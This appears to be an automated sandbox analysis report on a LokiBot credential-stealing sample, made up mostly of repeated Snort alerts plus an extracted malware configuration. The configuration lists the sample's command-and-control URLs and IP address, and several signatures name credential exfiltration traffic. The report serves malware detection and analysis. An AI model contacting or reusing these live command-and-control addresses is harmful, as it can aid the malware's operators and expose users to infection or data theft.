                      Timestamp:04/26/24-04:42:14.041821
                      SID:2025381
                      Source Port:49744
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:29.146660
                      SID:2025381
                      Source Port:49759
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:27.665907
                      SID:2024313
                      Source Port:49758
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:32.693379
                      SID:2024318
                      Source Port:49761
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:42.908989
                      SID:2021641
                      Source Port:49807
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:23.188583
                      SID:2021641
                      Source Port:49755
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:34.173942
                      SID:2025381
                      Source Port:49762
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:14.708232
                      SID:2025381
                      Source Port:49790
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:12.565966
                      SID:2024313
                      Source Port:49743
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:12.565966
                      SID:2024318
                      Source Port:49743
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:07.242464
                      SID:2021641
                      Source Port:49740
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:55.707371
                      SID:2025381
                      Source Port:49777
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:26.329932
                      SID:2021641
                      Source Port:49798
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:47.670237
                      SID:2024318
                      Source Port:49771
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:21.940707
                      SID:2025381
                      Source Port:49795
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:34.068335
                      SID:2021641
                      Source Port:49802
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:47.670237
                      SID:2024313
                      Source Port:49771
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:49.953966
                      SID:2025381
                      Source Port:49772
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:38.508836
                      SID:2021641
                      Source Port:49765
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:00.052049
                      SID:2025381
                      Source Port:49780
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:04.288590
                      SID:2021641
                      Source Port:49783
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:52.043341
                      SID:2024318
                      Source Port:49813
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:20.116742
                      SID:2024313
                      Source Port:49753
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:17.251353
                      SID:2021641
                      Source Port:49747
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:11.850756
                      SID:2021641
                      Source Port:49788
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:52.043341
                      SID:2024313
                      Source Port:49813
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:20.496255
                      SID:2024313
                      Source Port:49794
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:41.660723
                      SID:2025381
                      Source Port:49767
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:20.116742
                      SID:2024318
                      Source Port:49753
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:20.496255
                      SID:2024318
                      Source Port:49794
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:02.935480
                      SID:2024312
                      Source Port:49735
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:58.597395
                      SID:2025381
                      Source Port:49779
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:23.393350
                      SID:2024313
                      Source Port:49796
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:07.513137
                      SID:2025381
                      Source Port:49785
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:02.935480
                      SID:2024317
                      Source Port:49735
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:50.432496
                      SID:2021641
                      Source Port:49812
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:57.146160
                      SID:2021641
                      Source Port:49778
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:23.393350
                      SID:2024318
                      Source Port:49796
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:35.607137
                      SID:2024318
                      Source Port:49763
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:39.893817
                      SID:2024318
                      Source Port:49766
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:35.596260
                      SID:2024313
                      Source Port:49803
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:35.596260
                      SID:2024318
                      Source Port:49803
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:30.890483
                      SID:2021641
                      Source Port:49760
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:54.249806
                      SID:2021641
                      Source Port:49775
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:29.172203
                      SID:2024313
                      Source Port:49800
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:21.613500
                      SID:2025381
                      Source Port:49754
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:40.002816
                      SID:2024313
                      Source Port:49805
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:35.607137
                      SID:2024313
                      Source Port:49763
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:44.358398
                      SID:2024313
                      Source Port:49808
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:39.893817
                      SID:2024313
                      Source Port:49766
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:01.472637
                      SID:2021641
                      Source Port:49781
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:29.172203
                      SID:2024318
                      Source Port:49800
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:15.814851
                      SID:2021641
                      Source Port:49745
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:30.890483
                      SID:2025381
                      Source Port:49760
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:48.980951
                      SID:2024313
                      Source Port:49811
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:26.179565
                      SID:2025381
                      Source Port:49757
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:52.847994
                      SID:2024318
                      Source Port:49774
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:16.174844
                      SID:2024318
                      Source Port:49791
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:08.959356
                      SID:2021641
                      Source Port:49786
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:40.002816
                      SID:2024318
                      Source Port:49805
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:43.312556
                      SID:2024313
                      Source Port:49768
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:48.980951
                      SID:2024318
                      Source Port:49811
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:43.312556
                      SID:2024318
                      Source Port:49768
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:52.847994
                      SID:2024313
                      Source Port:49774
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:10.461205
                      SID:2025381
                      Source Port:49787
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:45.956580
                      SID:2021641
                      Source Port:49809
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:51.405219
                      SID:2021641
                      Source Port:49773
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:38.519329
                      SID:2021641
                      Source Port:49804
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:16.174844
                      SID:2024313
                      Source Port:49791
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:02.891159
                      SID:2025381
                      Source Port:49782
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:47.482327
                      SID:2021641
                      Source Port:49810
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:23.188583
                      SID:2024318
                      Source Port:49755
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:37.043735
                      SID:2024313
                      Source Port:49764
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:18.687770
                      SID:2025381
                      Source Port:49750
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:27.665907
                      SID:2021641
                      Source Port:49758
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:51.405219
                      SID:2024313
                      Source Port:49773
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:24.705958
                      SID:2025381
                      Source Port:49756
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:32.693379
                      SID:2021641
                      Source Port:49761
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:51.405219
                      SID:2024318
                      Source Port:49773
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:23.188583
                      SID:2024313
                      Source Port:49755
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:37.043735
                      SID:2024318
                      Source Port:49764
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:17.251353
                      SID:2025381
                      Source Port:49747
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:46.212974
                      SID:2021641
                      Source Port:49770
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:44.358398
                      SID:2025381
                      Source Port:49808
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:26.329932
                      SID:2024318
                      Source Port:49798
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:38.508836
                      SID:2025381
                      Source Port:49765
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:13.266385
                      SID:2024318
                      Source Port:49789
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:12.565966
                      SID:2021641
                      Source Port:49743
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:05.836233
                      SID:2021641
                      Source Port:49739
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:48.980951
                      SID:2025381
                      Source Port:49811
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:26.329932
                      SID:2024313
                      Source Port:49798
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:13.266385
                      SID:2024313
                      Source Port:49789
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:10.160803
                      SID:2021641
                      Source Port:49742
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:55.707371
                      SID:2021641
                      Source Port:49777
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:39.893817
                      SID:2025381
                      Source Port:49766
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:21.613500
                      SID:2024313
                      Source Port:49754
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:47.670237
                      SID:2021641
                      Source Port:49771
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:34.068335
                      SID:2024313
                      Source Port:49802
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:04.426692
                      SID:2024312
                      Source Port:49736
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:21.613500
                      SID:2024318
                      Source Port:49754
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:04.288590
                      SID:2024318
                      Source Port:49783
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:04.288590
                      SID:2024313
                      Source Port:49783
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:34.068335
                      SID:2024318
                      Source Port:49802
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:04.426692
                      SID:2024317
                      Source Port:49736
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:29.146660
                      SID:2021641
                      Source Port:49759
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:41.435996
                      SID:2024313
                      Source Port:49806
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:05.708325
                      SID:2025381
                      Source Port:49784
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:08.768305
                      SID:2024318
                      Source Port:49741
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:02.891159
                      SID:2024318
                      Source Port:49782
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:02.891159
                      SID:2024313
                      Source Port:49782
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:52.043341
                      SID:2021641
                      Source Port:49813
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:08.768305
                      SID:2024313
                      Source Port:49741
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:47.482327
                      SID:2025381
                      Source Port:49810
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:19.056808
                      SID:2021641
                      Source Port:49793
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:27.753457
                      SID:2024313
                      Source Port:49799
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:30.595490
                      SID:2025381
                      Source Port:49801
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:20.496255
                      SID:2025381
                      Source Port:49794
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:27.753457
                      SID:2024318
                      Source Port:49799
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:50.432496
                      SID:2024318
                      Source Port:49812
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:24.904349
                      SID:2025381
                      Source Port:49797
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:23.393350
                      SID:2021641
                      Source Port:49796
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:38.519329
                      SID:2025381
                      Source Port:49804
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:50.432496
                      SID:2024313
                      Source Port:49812
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:10.461205
                      SID:2021641
                      Source Port:49787
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:11.850756
                      SID:2025381
                      Source Port:49788
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:41.435996
                      SID:2024318
                      Source Port:49806
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:30.890483
                      SID:2024318
                      Source Port:49760
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:35.596260
                      SID:2021641
                      Source Port:49803
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:30.890483
                      SID:2024313
                      Source Port:49760
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:29.172203
                      SID:2021641
                      Source Port:49800
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:52.847994
                      SID:2021641
                      Source Port:49774
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:44.797094
                      SID:2025381
                      Source Port:49769
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:05.836233
                      SID:2024318
                      Source Port:49739
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:15.814851
                      SID:2024313
                      Source Port:49745
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:08.959356
                      SID:2024313
                      Source Port:49786
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:07.242464
                      SID:2025381
                      Source Port:49740
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:54.249806
                      SID:2025381
                      Source Port:49775
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:43.312556
                      SID:2021641
                      Source Port:49768
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:00.052049
                      SID:2021641
                      Source Port:49780
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:08.959356
                      SID:2024318
                      Source Port:49786
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:17.632927
                      SID:2024313
                      Source Port:49792
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:15.814851
                      SID:2024318
                      Source Port:49745
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:17.632927
                      SID:2024318
                      Source Port:49792
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:45.956580
                      SID:2024313
                      Source Port:49809
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:45.956580
                      SID:2024318
                      Source Port:49809
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: http://kbfvzoboss.bid/alien/fre.phpURL Reputation: Label: malware
                      Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
                      Source: http://alphastand.win/alien/fre.phpURL Reputation: Label: malware
                      Source: http://alphastand.trade/alien/fre.phpURL Reputation: Label: malware
                      Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.77.223.48/~blog/?ajax=posts.php"]}
                      Source: SCB#89940578.exeJoe Sandbox ML: detected
                      Source: SCB#89940578.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: SCB#89940578.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74

                      Networking

                      barindex
                      Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49735 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49735 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49735 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49735 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49736 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49736 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49736 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49736 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49739 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49739 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49739 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49739 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49740 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49740 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49740 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49740 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49741 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49741 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49741 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49741 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49742 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49742 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49742 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49742 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49743 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49743 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49743 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49743 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49744 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49744 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49744 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49744 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49745 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49747 -> 45.77.223.48:80
